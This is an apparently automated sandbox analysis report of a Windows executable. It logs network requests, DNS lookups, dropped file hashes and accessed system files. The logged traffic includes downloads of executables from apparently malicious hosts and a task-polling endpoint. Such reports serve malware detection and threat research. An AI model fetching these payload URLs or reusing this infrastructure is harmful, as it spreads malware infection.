SHA256:
1bceb4e84115eabb8bf3df704b5cc014834ca08b126451ae95d60a968e66d666
Date Analysed:
Mar 29, 2021
File type:
Win 32 executable
Version:
4.0.3
Environment:
Windows 7 64-bit Operating System
Network
HTTP conversation
[POST] http://192.168.23.15/6d2b15b9-58b9-4f34-8fe2-293b6beb3594/
Request Header
Content-Length: 733
POST /6d2b15b9-58b9-4f34-8fe2-293b6beb3594/ HTTP/1.1
Host: 192.168.23.15:5357
User-Agent: WSDAPI
Connection: Close
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/soap+xml
Status
200
Response body filetype
text/xml
Response Header
Content-Length: 2208
HTTP/1.1 200
Server: Microsoft-HTTPAPI/2.0
Connection: close
Date: Mon, 29 Mar 2021 10:05:31 GMT
Content-Type: application/soap+xml
[GET] http://t1.cloudshielding.xyz/tasks
Request Header
GET /tasks HTTP/1.1
Host: t1.cloudshielding.xyz
Accept: */*
User-Agent: prun
Status
200
Response body filetype
text/plain
Response Header
Content-Length: 1248
HTTP/1.1 200 OK
Vary: Origin
Server: nginx/1.14.0 (Ubuntu)
Connection: keep-alive
Date: Mon, 29 Mar 2021 10:05:25 GMT
Content-Type: text/plain; charset=utf-8
[GET] http://fetch.nerdprotect.xyz/p3.exe
Request Header
GET /p3.exe HTTP/1.1
Host: fetch.nerdprotect.xyz
Accept: */*
Status
200
Response body filetype
application/x-dosexec
Response Header
Content-Length: 1727355
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Last-Modified: Mon, 29 Mar 2021 10:00:03 GMT
Connection: keep-alive
ETag: "6061a523-1a5b7b"
Date: Mon, 29 Mar 2021 10:05:26 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
[POST] http://192.168.23.18/6d2b15b9-58b9-4f34-8fe2-293b6beb3594/
Request Header
Content-Length: 733
POST /6d2b15b9-58b9-4f34-8fe2-293b6beb3594/ HTTP/1.1
Host: 192.168.23.18:5357
User-Agent: WSDAPI
Connection: Close
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/soap+xml
Status
200
Response body filetype
text/xml
Response Header
Content-Length: 2208
HTTP/1.1 200
Server: Microsoft-HTTPAPI/2.0
Connection: close
Date: Mon, 29 Mar 2021 10:07:58 GMT
Content-Type: application/soap+xml
[GET] http://g.capboost.xyz/jhuimme.exe
Request Header
GET /jhuimme.exe HTTP/1.1
Host: g.capboost.xyz
Accept: */*
Status
200
Response body filetype
application/x-dosexec
Response Header
Content-Length: 998400
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Last-Modified: Thu, 25 Mar 2021 02:10:02 GMT
Connection: keep-alive
ETag: "605bf0fa-f3c00"
Date: Mon, 29 Mar 2021 10:04:50 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
[GET] http://shopfun.top/TT/Kara.exe
Request Header
Host: shopfun.top
GET /TT/Kara.exe HTTP/1.1
Accept: */*
Status
301
Response body filetype
text/html
Response Header
NEL: {"max_age":604800,"report_to":"cf-nel"}
Transfer-Encoding: chunked
Set-Cookie: __cfduid=dce2f0c437282eec385bfd2397bce8f9b1617012367; expires=Wed, 28-Apr-21 10:06:07 GMT; path=/; domain=.shopfun.top; HttpOnly; SameSite=Lax
CF-Cache-Status: DYNAMIC
cf-request-id: 091f0bb9820000dd7bbd283000000001
Server: cloudflare
Connection: keep-alive
location: https://shopfun.top/TT/Kara.exe
Date: Mon, 29 Mar 2021 10:06:08 GMT
HTTP/1.1 301 Moved Permanently
CF-RAY: 637848a26e1add7b-SIN
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Content-Type: text/html; charset=iso-8859-1
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=cJRJcp9UPlmLRJC%2FzSATXCCuk0IwGS0Io%2FaYttnoDOaJndkytQOle7ICwTuowtZPfDmwHqGHUZCG0%2FfGhGuP0%2F8LePwdpmwniWjRMg%3D%3D"}],"group":"cf-nel","max_age":604800}
[POST] http://192.168.23.16/587df1c9-7955-47ea-b3ad-16ef2a87b226/
Request Header
Content-Length: 733
POST /587df1c9-7955-47ea-b3ad-16ef2a87b226/ HTTP/1.1
Host: 192.168.23.16:5357
User-Agent: WSDAPI
Connection: Close
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/soap+xml
Status
200
Response body filetype
text/xml
Response Header
Content-Length: 2208
HTTP/1.1 200
Server: Microsoft-HTTPAPI/2.0
Connection: close
Date: Mon, 29 Mar 2021 10:08:51 GMT
Content-Type: application/soap+xml
[POST] http://192.168.23.14/e38fe390-ee87-4bed-88b9-25ffbf33fdf9/
Request Header
Content-Length: 733
POST /e38fe390-ee87-4bed-88b9-25ffbf33fdf9/ HTTP/1.1
Host: 192.168.23.14:5357
User-Agent: WSDAPI
Connection: Close
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/soap+xml
Status
200
Response body filetype
text/xml
Response Header
Content-Length: 2208
HTTP/1.1 200
Server: Microsoft-HTTPAPI/2.0
Connection: close
Date: Mon, 29 Mar 2021 10:05:28 GMT
Content-Type: application/soap+xml
[GET] http://159.89.171.243/1mb.dat
Request Header
GET /1mb.dat HTTP/1.1
Host: 159.89.171.243
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Status
200
Response body filetype
application/octet-stream
Response Header
Content-Length: 1048576
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Last-Modified: Sun, 15 Mar 2020 22:46:39 GMT
Connection: keep-alive
ETag: "5e6eb04f-100000"
Date: Mon, 29 Mar 2021 10:05:26 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
[GET] http://fetch.saleclutch.xyz/1.exe
Request Header
Host: fetch.saleclutch.xyz
Accept: */*
GET /1.exe HTTP/1.1
Status
200
Response body filetype
application/x-dosexec
Response Header
Content-Length: 324608
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Last-Modified: Mon, 29 Mar 2021 05:39:34 GMT
Connection: keep-alive
ETag: "60616816-4f400"
Date: Mon, 29 Mar 2021 10:04:44 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
[GET] http://www.msftncsi.com/ncsi.txt
Request Header
GET /ncsi.txt HTTP/1.1
Connection: Close
Host: www.msftncsi.com
User-Agent: Microsoft NCSI
Status
200
Response body filetype
text/plain
Response Header
Content-Length: 14
HTTP/1.1 200 OK
Connection: close
Cache-Control: max-age=30, must-revalidate
Date: Mon, 29 Mar 2021 10:05:39 GMT
Content-Type: text/plain
DNS Resolutions
t1.cloudshielding.xyz
["195.181.169.92", "195.181.169.92"]
fetch.nerdprotect.xyz
["195.181.169.92", "195.181.169.92"]
a1961.g2.akamai.net
["23.205.118.154", "23.205.118.16"]
time.microsoft.akadns.net
["40.81.94.65"]
proxy.netbounce.net
["195.181.164.195", "195.181.164.195"]
g.capboost.xyz
["195.181.169.92"]
m1.uptime66.com
["195.181.164.212", "195.181.164.212", "195.181.164.212"]
shopfun.top
["172.67.128.174", "104.21.2.38", "172.67.128.174", "104.21.2.38"]
www.msftncsi.com
[]
goQXflQiDKBwjCTFfnflSzU.goQXflQiDKBwjCTFfnflSzU
[]
fetch.saleclutch.xyz
["195.181.169.92"]
srv2.checkblanco.xyz
["195.181.169.92"]
teredo.ipv6.microsoft.com
[]
time.windows.com
[]
IP Traffic
UDP
239.255.255.250:3702
224.0.0.252:5355
224.0.0.251:5353
255.255.255.255:67
40.81.94.65:123
239.255.255.250:1900
255.255.255.255:68
TCP
195.181.164.195:9000
195.181.169.92:80
23.205.118.154:80
159.89.171.243:80
195.181.164.212:443
172.67.128.174:80
195.181.169.92:443
IGMP
224.0.0.22:0
224.0.0.1:0
Files Dropped
106c3cf938688e1d4e24480182d79ae969687e46d2b44d519f5b43dd90f9eecd
application/x-dosexec
6137f8db2192e638e13610f75e73b9247c05f4706f0afd1fdb132d86de6b4012
text/plain
64cb3cc325655ba7a7e955c6f6c39dd4ef2a237e6605dd4d11e63c5bc387edd9
text/xml
71e9538820b12b60ce88608c9f7da7072fc93836269d16a332fc196550ef6679
text/html
220e22217eda89a5f0fd7a39a7da2a8abc7f88eee8856c6540c8fe4e6dfd5928
text/xml
2f1d25b8a95247a563512983c3686346aa3e3911ff5da98a6eed799067a3dd62
text/xml
75220584fa1576a69af7ee4c9ec0e0ba2fab24e75b122be3086422f7cd3e3acb
application/x-dosexec
291cd644d26e99352bfdf5c87772859bf2c15c801ea4541a10d1ba3fb8690752
text/xml
036b02cc8e48e615e9c498b60f2505bf36db7afb5e5f057eab609aae4d0243ae
text/xml
2ceeca59ccd8705cf5c133fbc43d48eb17ee488d954f249196d051baedd62dc3
application/x-dosexec
05765e9a5cee5af6f5b1ca383427314bc82c4c5a2e8d3579db2bbfbe8542d3e4
text/plain
e3507a5019fad5b9f83252c492ad21f84f88523cc7650253a9ff7e15024296c5
text/xml
7298da0916328fffc3ccfc34982b56b4fe5853f7ca814f827b8c536bf4640304
text/xml
03f51bec889449243b6705a7c346183de64326cb8ddd52ccfc6e48a98a45ebab
application/x-dosexec
ja3
d0ee3237a14bbd89ca4d2b5356ab20ba
client_hello_pkt
1603010118010001140303a6ab65e50d308392634d067d6eeb4e994800d53f3011d3d73b4bd09265b80f1620a68277da8215ccbf28a7d7903ffbf54c64c9f7a66ff7ba4b2f5bb1911dedff900026c02fc030c02bc02ccca8cca9c013c009c014c00a009c009d002f0035c012000a130113031302010000a500000014001200000f6d312e757074696d6536362e636f6d000500050100000000000a000a0008001d001700180019000b00020100000d001a0018080404030807080508060401050106010503060302010203ff010001000010000e000c02683208687474702f312e3100120000002b0009080304030303020301003300260024001d0020ea9f95655678c8918c8aa394a512656b246f08dac2aca8f11c78361eed231117
destination_ip
195.181.164.212
httpsDomain
m1.uptime66.com
timestamp
1617012626.13
destination_port
443
ja3
771,49199-49200-49195-49196-52392-52393-49171-49161-49172-49162-156-157-47-53-49170-10-4865-4867-4866,0-5-10-11-13-65281-16-18-43-51,29-23-24-25,0
Process
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\VERSION.DLL
C:\WINDOWS\SYSWOW64\MSIMG32.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\NTDLL.DLL
C:\WINDOWS\SYSWOW64\KERNEL32.DLL
C:\MALWARE\1BCEB4E84115EABB8BF3DF704B5CC014834CA08B126451AE95D60A968E66D666.EXE
C:\WINDOWS\SYSWOW64\APPHELP.DLL
C:\WINDOWS\SYSWOW64\ADVAPI32.DLL
C:\WINDOWS\SYSWOW64\WINMM.DLL
C:\WINDOWS\SYSWOW64\WS2_32.DLL
C:\WINDOWS\SYSWOW64\POWRPROF.DLL
C:\WINDOWS\SYSWOW64\EN-US\SETUPAPI.DLL.MUI
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\WINDOWS\SYSWOW64\WSHTCPIP.DLL
C:\WINDOWS\SYSWOW64\EN-US\WSHTCPIP.DLL.MUI
C:\WINDOWS\SYSWOW64\WSHIP6.DLL
C:\WINDOWS\SYSWOW64\EN-US\WSHIP6.DLL.MUI
C:\WINDOWS\SYSWOW64\WSHQOS.DLL
C:\WINDOWS\SYSWOW64\EN-US\WSHQOS.DLL.MUI
C:\WINDOWS\SYSWOW64\CMD.EXE
C:\WINDOWS\APPPATCH\SYSMAIN.SDB
C:\WINDOWS\SYSWOW64\WINBRAND.DLL
C:\WINDOWS\SYSWOW64\EN-US\CMD.EXE.MUI
C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH_TARGET_2162329
C:\WINDOWS\SYSWOW64\WBEM
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
C:\WINDOWS\SYSWOW64\ATL.DLL
C:\WINDOWS\SYSWOW64\MSCOREE.DLL
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\EN-US\POWERSHELL.EXE.MUI
C:\WINDOWS\SYSWOW64\UXTHEME.DLL
C:\WINDOWS\REGISTRATION\R000000000006.CLB
C:\WINDOWS\SYSWOW64\SHELL32.DLL
C:\WINDOWS\SYSWOW64\USERENV.DLL
C:\WINDOWS\SYSWOW64\PROFAPI.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.WINDOWS.COMMON-CONTROLS_6595B64144CCF1DF_6.0.7601.17514_NONE_41E6975E2BD6F2B2\COMCTL32.DLL
C:\WINDOWS\WINDOWSSHELL.MANIFEST
C:\WINDOWS\SYSWOW64\PROPSYS.DLL
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\CACHES\CVERSIONS.1.DB
C:\WINDOWS\SYSWOW64\NTMARTA.DLL
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\CACHES\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.VER0X0000000000000001.DB
C:\USERS\DESKTOP.INI
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\DESKTOP.INI
C:\USERS\ADMINISTRATOR\DESKTOP\DESKTOP.INI
C:\WINDOWS\SYSWOW64\EN-US\SHELL32.DLL.MUI
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\DESKTOP.INI
C:\USERS\PUBLIC\DESKTOP.INI
C:\USERS\PUBLIC\DESKTOP\DESKTOP.INI
C:\WINDOWS\SYSWOW64\GAMEUX.DLL
C:\WINDOWS\SYSWOW64\EN-US\GAMEUX.DLL.MUI
C:\WINDOWS\WINSXS\X86_MICROSOFT.WINDOWS.GDIPLUS_6595B64144CCF1DF_1.1.7601.17514_NONE_72D18A4386696C80\GDIPLUS.DLL
C:\WINDOWS\SYSWOW64\XMLLITE.DLL
C:\WINDOWS\SYSWOW64\WER.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\INTERNET EXPLORER\QUICK LAUNCH\DESKTOP.INI
C:\WINDOWS\SYSWOW64\SHDOCVW.DLL
C:\WINDOWS\SYSWOW64\EN-US\SHDOCVW.DLL.MUI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\WINDOWS POWERSHELL\DESKTOP.INI
C:\WINDOWS\SYSWOW64\LINKINFO.DLL
C:\WINDOWS\SYSWOW64\NTSHRUI.DLL
C:\WINDOWS\SYSWOW64\SRVCLI.DLL
C:\WINDOWS\SYSWOW64\CSCAPI.DLL
C:\WINDOWS\SYSWOW64\SLC.DLL
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\WINDOWS POWERSHELL\WINDOWS POWERSHELL.LNK
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL_ISE.EXE
C:\WINDOWS\HH.EXE
C:\WINDOWS\SYSWOW64\CRYPTSP.DLL
C:\WINDOWS\SYSWOW64\RSAENH.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\94IYE447TS3OVIVOFHLI.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\JGRNUS9P3WSM6KU1PKW0.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFA784.TMP
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\MSCOREEI.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORWKS.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CLR.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.VC80.CRT_1FC8B3B9A1E18E3B_8.0.50727.4940_NONE_D08CC06A442B34FC\MSVCR80.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\PSKUL7GJMAB0ONUO017P.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFA7B3.TMP
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CONFIG\MACHINE.CONFIG
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\INDEX149.DAT
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MSCORLIB\62A0B3E4B40EC0E8C5CFAA0C8848E64A\MSCORLIB.NI.DLL
C:\WINDOWS\ASSEMBLY\PUBPOL25.DAT
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM\9E0A3B9B9F457233A335D7FBA8F95419\SYSTEM.NI.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\8XSEURBKIJZ9I1OAGOAD.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFA811.TMP
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\B1C511D8FAD78AD3C5213B2B4FB02B8B\MICROSOFT.POWERSHELL.CONSOLEHOST.NI.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\MCCJNPLYDM9988TJ2P7M.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFA83F.TMP
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.CONSOLEHOST\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.MANAGEMENT.AUTOMATION\1.0.0.0__31BF3856AD364E35\SYSTEM.MANAGEMENT.AUTOMATION.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM\2.0.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.MANAGEMENT.A#\4436815B432C313255AF322F4EC3560D\SYSTEM.MANAGEMENT.AUTOMATION.NI.DLL
C:\WINDOWS\SYSWOW64\L_INTL.NLS
C:\WINDOWS\SYSWOW64\EN-US\KERNELBASE.DLL.MUI
C:\WINDOWS\ASSEMBLY\GAC_32\MSCORLIB\2.0.0.0__B77A5C561934E089\SORTTBLS.NLP
C:\WINDOWS\ASSEMBLY\GAC_32\MSCORLIB\2.0.0.0__B77A5C561934E089\SORTKEY.NLP
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.CORE\FBC05B5B05DC6366B02B8E2F77D080F1\SYSTEM.CORE.NI.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\4F68CD04686E5DC5A55070D112D44BDF\MICROSOFT.POWERSHELL.COMMANDS.DIAGNOSTICS.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.DIAGNOSTICS\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.CORE\3.5.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.CONFIGURATIO#\F02737C83305687A68C088927A6C5A98\SYSTEM.CONFIGURATION.INSTALL.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.CONFIGURATION.INSTALL\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.WSMAN.MAN#\EE28A075665B6BC23B6DAE56903D431D\MICROSOFT.WSMAN.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.WSMAN.MANAGEMENT\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.WSMAN.RUNTIME\1.0.0.0__31BF3856AD364E35\MICROSOFT.WSMAN.RUNTIME.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.TRANSACTIONS\AD18F93FC713DB2C4B29B25116C13BD8\SYSTEM.TRANSACTIONS.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_32\SYSTEM.TRANSACTIONS\2.0.0.0__B77A5C561934E089\SYSTEM.TRANSACTIONS.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\3008A05E2928E2C1D856CC34E0422C17\MICROSOFT.POWERSHELL.COMMANDS.UTILITY.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.UTILITY\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\8DF695FB80187F65208D87229E81E8A2\MICROSOFT.POWERSHELL.COMMANDS.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.MANAGEMENT\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\8CE205027E30804D1B2DEAFFA0582735\MICROSOFT.POWERSHELL.SECURITY.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.SECURITY\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CULTURE.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORRC.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\FYOMWUZS8SQ46UF07U26.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFAA90.TMP
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.XML\461D3B6B3F43E6FBE6C897D5936E17E4\SYSTEM.XML.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.XML\2.0.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.MANAGEMENT\6F3B99ED0B791FF4D8AA52F2F0CD0BCF\SYSTEM.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.MANAGEMENT\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.DIRECTORYSER#\45EC12795950A7D54691591C615A9E3C\SYSTEM.DIRECTORYSERVICES.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.DIRECTORYSERVICES\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\SYSWOW64\SHFOLDER.DLL
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\GETEVENT.TYPES.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\TYPES.PS1XML
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\NDYVXIRAZ4AR0EDNYDHZ.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFABC8.TMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\YFUSY1A214O5F6MY47ER.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFAC07.TMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\BH8GG2G5KLF6CI9IF3JV.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFADDB.TMP
C:\WINDOWS\SYSWOW64\TZRES.DLL
C:\WINDOWS\SYSWOW64\MSWSOCK.DLL
C:\WINDOWS\SYSWOW64\EN-US\TZRES.DLL.MUI
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\DIAGNOSTICS.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\WSMAN.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\CERTIFICATE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\DOTNETTYPES.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\FILESYSTEM.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\HELP.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELLCORE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELLTRACE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\REGISTRY.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\SECUR32.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.DATA\1E85062785E286CD9EAE9C26D2C61F73\SYSTEM.DATA.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_32\SYSTEM.DATA\2.0.0.0__B77A5C561934E089\SYSTEM.DATA.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORJIT.DLL
C:\WINDOWS\SYSWOW64\DNSAPI.DLL
C:\WINDOWS\SYSWOW64\IPHLPAPI.DLL
C:\WINDOWS\SYSWOW64\WINNSI.DLL
C:\PROGRAM FILES\NODEJS
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\PROGRAMS\PYTHON\PYTHON37\SCRIPTS
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\NPM
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\DIASYMREADER.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\TVJQ15YNJB5LU4FF3EIW.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFB643.TMP
C:\WINDOWS\SYSWOW64\RASADHLP.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\5EWXH2EKYNLALY8QH70N.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFBC3C.TMP
C:\WINDOWS\SYSWOW64\FWPUCLNT.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\NKPN2J4M4SBW90ICH9PK.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFBD26.TMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\KH0WBVPYPHJZ5WJ8Y4IX.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFBDD2.TMP
C:\WINDOWS\SYSWOW64\NETUTILS.DLL
C:\WINDOWS\SYSWOW64\CRYPT32.DLL
